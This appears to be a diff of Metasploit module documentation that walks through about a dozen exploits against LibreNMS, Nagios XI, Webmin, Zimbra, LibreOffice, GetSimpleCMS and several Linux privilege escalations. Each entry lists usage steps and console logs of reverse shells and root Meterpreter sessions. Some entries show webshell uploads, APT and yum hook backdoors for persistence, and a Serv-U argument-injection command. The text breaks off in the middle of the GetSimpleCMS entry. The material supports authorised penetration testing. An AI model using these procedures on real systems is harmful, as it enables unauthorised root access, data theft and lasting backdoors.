In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
4. Do: ```set RHOSTS <ip>```
5. Do: ```set USERNAME <user>```
6. Do: ```set PASSWORD <pass>```
7. Do: ```run```
8. You should get a shell.
## Scenarios
### Tested on LibreNMS 1.46 on Ubuntu 18.04
```
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
rhosts => 192.168.37.143
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
username => blah
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
password => password
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
[*] Started reverse TCP double handler on 192.168.37.1:4444
[*] Successfully logged into LibreNMS
[+] Successfully added device with hostname dFEzcH
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dFEzcH and id #126
[*] Command: echo 38eJIFZsiRl3Er48;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500
whoami
www-data
uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
```
@@ -0,0 +1,116 @@
# Vulnerable Application
Nagios XI 5.5.6 Root Remote Code Execution
The exploit works as follows:
- A local HTTPS server is setup. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours obviously), this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
- A command is executed thanks to the webshell. This command elevates privileges and run the meterpreter executable, giving us a meterpreter session.
# Creating A Testing Environment
- Install a Ubuntu Linux LTS (I used 18.04 LTS for my tests) in a VM.
- Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
- Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).
# Verification Steps
1. `use exploit/linux/http/nagios_xi_root_rce`
2. `set RHOSTS [IP]`
3. `set RSRVHOST [IP]`
4. `exploit`
A meterpreter session should have been opened successfully and you should be root
# Options
## RSRVHOST
IP at which your local HTTPS can be reached. Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).
## RSRVPORT
Port that will forward to your local HTTPS server.
## SRVHOST
IP of your local HTTPS server (must be a local IP).
## SRVPORT
Port to listen to for your local HTTPS server.
# Scenarios
## Nagios 5.5.6 on Ubuntu 18.04 LTS
```
msf5 exploit(linux/http/nagios_xi_magpie_debug) > show options
Module options (exploit/linux/http/nagios_xi_magpie_debug):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 5 no Number of seconds the web server will wait before termination
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.135.129 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
RSRVHOST 172.16.135.1 yes A public IP at which your host can be reached (e.g. your router IP)
RSRVPORT 8080 yes The port that will forward to the local HTTPS server
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.135.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nagios XI 5.5.6
msf5 exploit(linux/http/nagios_xi_magpie_debug) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.135.1:4444
msf5 exploit(linux/http/nagios_xi_magpie_debug) > [*] Using URL: https://0.0.0.0:8080/ixFonv2
[*] Local IP: https://192.168.0.21:8080/ixFonv2
[*] Server started.
[*] nZOnJhGnMb.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/mTwEwHtAuz0V
[*] Local IP: https://192.168.0.21:8080/mTwEwHtAuz0V
[*] Server started.
[*] SQmBobwBzw uploaded with success!
[*] Sending stage (985320 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:33090) at 2019-06-25 16:13:01 -0500
[+] Deleted /usr/local/nagvis/share/nZOnJhGnMb.php
[+] Deleted /usr/local/nagvis/share/SQmBobwBzw
[!] This exploit may require manual cleanup of '/var/tmp/mtrhbwFZHa.nse' on the target
[*] Server stopped.
msf5 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.135.129
OS : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
@@ -0,0 +1,54 @@
## Description
This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
## Vulnerable Application
This module has been tested with [Webmin 1.910](https://sourceforge.net/projects/webadmin/files/webmin/1.910/)
## Verification Steps
1. `use exploit/lunix/http/webmin_packageup_rce`
2. `set rhosts <rhost>`
3. `set username <username>`
4. `set password <password>`
5. `exploit`
## Scenarios
### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64
```
msf5 >
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check
[*] NICE! rce has the right to >>Package Update<<
[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
[*] Attempting to execute the payload...
[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
pwd
/usr/share/webmin/package-updates/
exit
```
@@ -0,0 +1,48 @@
## Description
This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
## Vulnerable Application
Zimbra Collaboration Suite v8.5 to v8.7.11.
[Zimbra 8.7.1 GA FOSS Edition](https://files.zimbra.com/downloads/8.7.1_GA/zcs-8.7.1_GA_1670.UBUNTU16_64.20161025045114.tgz)
[Installation](https://zimbra.github.io/installguides/latest/single.html#Installing_Zimbra_Collaboration_Software)
## Verification Steps
1. `./msfconsole -q`
2. `use exploit/linux/http/zimbra_xxe_rce`
3. `set rhosts <rhost>`
4. `set lhost <lhost>`
5. `exploit`
## Scenarios
### Zimbra 8.7.1 GA 1670 FOSS edition Tested on Ubuntu 16.04.6 LTS
```
msf5 exploit(linux/http/zimbra_xxe_rce) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Using URL: http://0.0.0.0:8080/2tQ75DxRvaeGRSP
[*] Local IP: http://192.168.171.150:8080/2tQ75DxRvaeGRSP
[*] Server started.
[+] Password found: Syz7fOPJI
[+] User cookie retrieved: ZM_AUTH_TOKEN=0_c6df3ed73afbefd7eff40eb9f6999794ebf764b5_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343239343539303239353b747970653d363a7a696d6272613b753d313a613b7469643d393a3538303338373138373b;
[+] Admin cookie retrieved: ZM_ADMIN_AUTH_TOKEN=0_c1c8a6c715eb8f55c14aa63e82a8ff64e4fbe279_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343136343939303333353b61646d696e3d313a313b747970653d363a7a696d6272613b753d313a613b7469643d383a36303437383736333b;
[*] Uploading jsp shell
[*] Executing payload on /downloads/XFlHBolHjLB.jsp
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.111:53746) at 2019-04-01 07:29:51 -0500
[*] Server stopped.
whoami
zimbra
uname -a
Linux zimbra.mylocaldomain.local 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
../bin/zmcontrol -v
Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
exit
[*] 172.22.222.111 - Command shell session 1 closed.
```
@@ -1,19 +1,25 @@
## Description
This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.
This module attempts to gain root privileges on Linux systems with
a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
as the crash handler.
## Vulnerable Application
A race condition in ABRT allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.
A race condition allows local users to change ownership of arbitrary
files (CVE-2015-3315). This module uses a symlink attack on
`/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,
then adds a new user with UID=0 GID=0 to gain root privileges.
Winning the race could take a few minutes.
This module has been tested successfully on ABRT packaged versions:
This module has been tested successfully on:
* 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
* 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
* 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
* abrt 2.1.11-12.el7 on RHEL 7.0 x86_64
* abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
* abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
* abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
* abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64
## Verification Steps
@@ -0,0 +1,66 @@
## Description
This module will run a payload when the package manager is used. No
handler is ran automatically so you must configure an appropriate
exploit/multi/handler to connect. This module creates a pre-invoke hook
for APT in apt.conf.d. The hook name syntax is numeric followed by text.
## Verification Steps
1. Exploit a box that uses APT
2. `use linux/local/apt_package_manager_persistence`
3. `set SESSION <id>`
4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
5. `exploit`
When the system runs apt-get update the payload will launch. You must set handler accordingly.
## Options
**BACKDOOR_NAME**
Name of backdoor executable
**HOOKNAME**
Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/. Pre-invoke hook name syntax is numeric followed by text.
**WritableDir**
Writable directory for backdoor default is (/usr/local/bin/)
## Scenarios
### Tested on Ubuntu 18.04.2 LTS
```
msf5 > use exploit/linux/local/apt_package_manager_persistence
msf5 exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444
[*] Payload handler running as background job 0.
msf5 exploit(linux/local/apt_package_manager_persistence) >
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] Sending stage (985320 bytes) to 172.22.222.130
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60526) at 2019-04-26 13:04:33 -0500
msf5 exploit(linux/local/apt_package_manager_persistence) > set session 1
session => 1
msf5 exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136
lhost => 172.22.222.136
msf5 exploit(linux/local/apt_package_manager_persistence) > set lport 4444
lport => 4444
msf5 exploit(linux/local/apt_package_manager_persistence) > exploit
[*] Attempting to write hook:
[*] Wrote /etc/apt/apt.conf.d/34bmUIzfd
[*] Backdoor uploaded /usr/local/bin/dbmqKeh6U9
[*] Backdoor will run on next APT update
msf5 exploit(linux/local/apt_package_manager_persistence) >
[*] Sending stage (985320 bytes) to 172.22.222.130
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:60528) at 2019-04-26 13:05:17 -0500
msf5 exploit(linux/local/apt_package_manager_persistence) >
```
Note: Second session comes in after running `apt update` on the remote host
@@ -25,6 +25,7 @@
* Ubuntu 14.04.1 kernel 4.4.0-89-generic;
* Ubuntu 16.04.2 kernel 4.8.0-45-generic;
* Ubuntu 16.04.3 kernel 4.10.0-28-generic;
* Ubuntu 16.04.5 kernel 4.4.0-116-generic;
* Ubuntu 17.04 kernel 4.10.0-19-generic;
* ZorinOS 12.1 kernel 4.8.0-39-generic.
@@ -0,0 +1,22 @@
## Description
This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
## Demo
```
msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
[*] Started reverse TCP handler on 192.168.0.21:4444
[*] Uploading /tmp/mYVrqmsETa.bin
[*] chmod the file with +x
[*] Executing /tmp/mYVrqmsETa.bin
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
[+] Deleted /tmp/mYVrqmsETa.bin
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
@@ -1,25 +1,33 @@
## Description
This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker - aka glibc `$ORIGIN` expansion vulnerability.
This module attempts to gain root privileges on Linux systems by abusing
a vulnerability in the GNU C Library (glibc) dynamic linker.
## Vulnerable Application
glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows control over the `$ORIGIN` library search path resulting in execution of arbitrary shared objects.
glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
properly restrict use of the `LD_AUDIT` environment variable when loading
setuid executables which allows control over the `$ORIGIN` library search
path resulting in execution of arbitrary shared objects.
This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution.
This module opens a file descriptor to the specified suid executable via
a hard link, then replaces the hard link with a shared object before
instructing the linker to execute the file descriptor, resulting in
arbitrary code execution.
The specified setuid binary must be readable and located on the same file system partition as the specified writable directory.
The specified setuid binary must be readable and located on the same
file system partition as the specified writable directory.
This module has been tested successfully on:
* glibc 2.5 on CentOS 5.4 (x86_64)
* glibc 2.5 on CentOS 5.5 (x86_64)
* glibc 2.12 on Fedora 13 (i386, x86_64)
* glibc 2.12 on Fedora 13 (i386)
* glibc 2.5-49 on RHEL 5.5 (x86_64)
RHEL 5 is reportedly affected, but untested.
Some versions of `ld.so`, such as the version shipped with Ubuntu 14, hit a failed assertion in `dl_open_worker` causing exploitation to fail.
Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
hit a failed assertion in `dl_open_worker` causing exploitation to fail.
## Verification Steps
@@ -0,0 +1,76 @@
## Description
This module attempts to gain root privileges on systems running
Serv-U FTP Server versions prior to 15.1.7.
The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
in a call to `system()`, without validation, when invoked with
the `-prepareinstallation` flag, resulting in command execution
with root privileges.
## Vulnerable Application
[Serv-U FTP Server](https://www.serv-u.com/ftp-server-software)
is an FTP server for Linux and Windows; however, this module
targets only Linux systems.
This module has been tested successfully on:
* Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**SERVU_PATH**
Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`)
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
### Debian 9.6 (x64)
```
msf5 exploit(multi/handler) > back
msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] bash shell is available
[+] /usr/local/Serv-U/Serv-U is executable
[+] /usr/local/Serv-U/Serv-U is setuid
[*] Writing '/tmp/.24HnCiwSby' (277 bytes) ...
[*] Executing command: bash -c 'exec -a "\";chown root /tmp/.24HnCiwSby;chmod u+s /tmp/.24HnCiwSby;chmod +x /tmp/.24HnCiwSby\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
[+] /tmp/.24HnCiwSby setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.250
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.250:58662) at 2019-06-28 23:46:48 -0400
[-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
@@ -0,0 +1,114 @@
## Description
This module attempts to gain root privileges by exploiting a
vulnerability in the `staprun` executable included with SystemTap
version 1.3.
The `staprun` executable does not clear environment variables prior to
executing `modprobe`, allowing an arbitrary configuration file to be
specified in the `MODPROBE_OPTIONS` environment variable, resulting
in arbitrary command execution with root privileges.
## Vulnerable Application
This module has been tested successfully on:
* systemtap 1.2-1.fc13-i686 on Fedora 13 (i686)
* systemtap 1.1-3.el5 on RHEL 5.5 (x64)
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use exploit/linux/local/systemtap_modprobe_options_priv_esc`
4. `set SESSION [SESSION]`
5. `check`
6. `run`
7. You should get a new *root* session
## Options
**STAPRUN_PATH**
Path to staprun executable (default: `/usr/bin/staprun`)
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
### Red Hat Enterprise Linux 5.5 (x64)
```
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/staprun is executable
[+] /usr/bin/staprun is setuid
[*] Writing '/tmp/.rX9IoM53YEb92' (207 bytes) ...
[*] Writing '/tmp/.rX9IoM53YEb92.conf' (23 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.202
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.202:52074) at 2019-04-18 12:50:56 -0400
[+] Deleted /tmp/.rX9IoM53YEb92
[+] Deleted /tmp/.rX9IoM53YEb92.conf
ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
Retrying, after attempted removal of module As5A2hFpvQ2L (rc -1)
ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Red Hat Enterprise Linux 5 (Linux 2.6.18-194.el5)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
### Fedora 13 (x86)
```
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/staprun is executable
[+] /usr/bin/staprun is setuid
[*] Writing '/tmp/.otCyN6cAa7aUo0v' (207 bytes) ...
[*] Writing '/tmp/.otCyN6cAa7aUo0v.conf' (23 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
Retrying, after attempted removal of module l0rDp93O8f (rc -1)
ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:33541) at 2019-04-19 07:26:46 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : fedora13.localdomain
OS : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
@@ -0,0 +1,84 @@
## Description
This module will run a payload when the package manager is used. No
handler is ran automatically so you must configure an appropriate
exploit/multi/handler to connect. Module modifies a yum plugin to
launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/
will show what plugins are currently enabled on the system.
## Verification Steps
1. Exploit a box that uses Yum
2. `use linux/local/yum_package_manager_persistence`
3. `set SESSION <id>`
4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
5. `exploit`
When the system runs yum update the payload will launch. You must set handler accordingly.
## Options
**BACKDOOR_NAME**
Name of backdoor executable
**PLUGIN**
Name of the yum plugin to target
**WritableDir**
Writable directory for backdoor default is (/usr/local/bin/)
**PluginPath**
Plugin path to use default is (/usr/lib/yum-plugins/)
## Scenarios
### Tested on Fedora 21
```
msf5 exploit(linux/local/yum_package_manager_persistence) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux 172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135)
msf5 exploit(linux/local/yum_package_manager_persistence) > set session 1
session => 1
msf5 exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks
plugin => langpacks
msf5 exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136
lhost => 172.22.222.136
msf5 exploit(linux/local/yum_package_manager_persistence) > exploit
[*] /usr/lib/yum-plugins/langpacks.py
[+] Plugins are enabled!
[*] Attempting to modify plugin
[*] Backdoor uploaded to /usr/local/bin/z9fJTx2wVg
[*] Backdoor will run on next Yum update
msf5 exploit(linux/local/yum_package_manager_persistence) > [*] Command shell session 2 opened (172.22.222.136:4444 -> 172.22.222.135:43791) at 2019-04-30 06:21:12 -0500
msf5 exploit(linux/local/yum_package_manager_persistence) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux 172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135)
2 shell cmd/unix 172.22.222.136:4444 -> 172.22.222.135:43791 (172.22.222.135)
msf5 exploit(linux/local/yum_package_manager_persistence) > sessions -i 2
[*] Starting interaction with 2...
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux localhost.localdomain 3.17.4-301.fc21.x86_64 #1 SMP Thu Nov 27 19:09:10 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 172.22.222.135 - Command shell session 2 closed.
msf5 exploit(linux/local/yum_package_manager_persistence) >
```
Note: Session 2 is received after running yum update on the remote host.
@@ -0,0 +1,98 @@
## Description
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
this module due to the lack of ability to pass arguments.
LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
to them. A macro can be tied to a program event by including the script that contains the macro and the function
name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
that passes arguments to `os.system`, allowing RCE.
This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.
## Vulnerable Application
LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
4. Do: ```set FILENAME <name>```
5. Do: ```set LHOST <ip>```
6. Do: ```set LPORT <port>```
7. Do: ```run```
8. Move the generated file to the target
9. Start a handler
10. Open the file with a vulnerable version of LibreOffice
11. You should get a shell.
## Scenarios
### Tested on LibreOffice 6.1.2.1 running Windows 7
```
msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (179779 bytes) to 192.168.37.156
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
meterpreter > getuid
Server username: WIN-MGMN7ND70I1\a_user
meterpreter > sysinfo
Computer : WIN-MGMN7ND70I1
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
```
### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
```
msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
target => 1
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.37.1
LHOST => 192.168.37.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (985320 bytes) to 192.168.37.174
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer : 192.168.37.174
OS : Ubuntu 18.04 (Linux 4.18.0-16-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
```
@@ -0,0 +1,48 @@
## Description
This module exploits a vulnerability found in GetSimpleCMS, which
allows unauthenticated attackers to perform Remote Code Execution.
An arbitrary file upload vulnerability can be triggered by an
authenticated user, however authentication can be bypassed by leaking
the cms API key to target the session manager.
## Vulnerable Application
GetSimple CMS versions 3.3.15 and below
Vulnerable installations can be found [here](http://get-simple.info/)
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/multi/http/getsimplecms_unauth_code_exec```
4. Do: ```set RHOSTS <IP>```
4. Do: ```run```
5. You should get a shell.
## Scenarios
### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04
```
msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec
